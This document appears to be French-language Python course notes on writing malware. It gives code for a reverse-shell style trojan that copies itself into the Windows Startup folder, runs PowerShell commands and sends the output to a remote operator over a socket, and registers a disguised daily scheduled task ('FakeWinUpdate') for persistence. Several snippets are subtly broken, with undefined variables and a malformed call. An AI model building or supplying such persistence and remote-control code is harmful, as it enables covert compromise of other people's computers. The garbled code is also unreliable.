Cours 2 MW Python

Malware

II. Condition User\

 Etablir des conditions :

if "User\n" in userprofile:
pass
elif "User\r" in userprofile:
pass
elif "User\s" in userprofile:
pass
else:
pass
userprofile = userprofile.replace("\n","")
userprofile = userprofile.replace("\r", "")
userprofile = userprofile.replace("\s", "")
 

III. argv

Utiliser argv

loc = argv [0]
to_dir = r"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup".format(userprofile)
env = 'cp"{0}""{1};cd"{1}"'.format(loc,to_dir)
print("ENV:", env)
proc = subprocess.Popen(["powershell.exe",env]stdout=subprocess.PIPE,shell=True)
(out,err) = proc.communicate()
print("\n\n",out,err)
sock.send(str(out).encode())

IV. Message d’erreur

Message d’erreur

        except Exception as e:
msg = "error:{}".format(e)
msg = bytes(msg, encoding="utf-8")
sock.send(msg)
except ConnectionRefusedError as reror:
print("Connection refused, try again...")
shell()
except TimeoutError as timeout:
print("Time out, try again...")
shell()
except ConnectionResetError as hackerdidit:
print("Connection closed...")
shell()

 

V. Schedule

 Nous allons rajouter schedule dans les commandes et nous allons définir schedule :

Slider ==>

def schedule():
sock.send("Please follow the rules\n".encode())

question = f"\n\n[+] Pick taskname, no space,symbols,extensions. FakeWinUpdate\n\n>"
sock.send(question.encode())
taskname = sock.recv(1024).decode("utf-8")
taskname = taskname.replace("\n", "")

not_allowed_symbols = [",", ".", "-", ",", ":", "+", "_", "-", "*", "(", ")"]
for k in not_allowed_symbols:
if k in taskname:
taskname = taskname.replace(k, "")

questiontwo ="\n[+] When? (available from 1am to 11am); write the number, ex.9 ->sched for 9am\n>"
sock.send(questiontwo.encode())
whenSched = sock.recv(1024).decode("utf-8")
whenSched = whenSched.replace("\n", "")

questionthree = "\n[+] Enter description, no symbols,scpace. \n>"
sock.send(questionthree.encode())
taskdesc = sock.recv(1024).decode("utf-8")
taskdesc = taskdesc.replace("\n", "")

path_to_vir = argv[0]

command = "$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument'{0}';$trigger = " \
"New-ScheduledTaskTrigger -Daily -At{1}am;Register-ScheduledTask -Action $action -Trigger $trigger -" \
"TaskName'{2}' -Description'{3}'".format(path_to_vir, whenSched, taskname, taskdesc)

VI. Command execute/error

Vous informe si votre commande est executer ou non:

try:
workit = subprocess.Popen(["powershell.exe", command], stdout=subprocess.PIPE, shell=True)
(workit,errtwo) = workt.communicate()
sock.send(workittwo)

sock.send("command used:".encode())
sock.send(command.encode())

sock.send("Added to schedul".encode())
except Exception as schedulererror:
sock.send("command not execute".encode())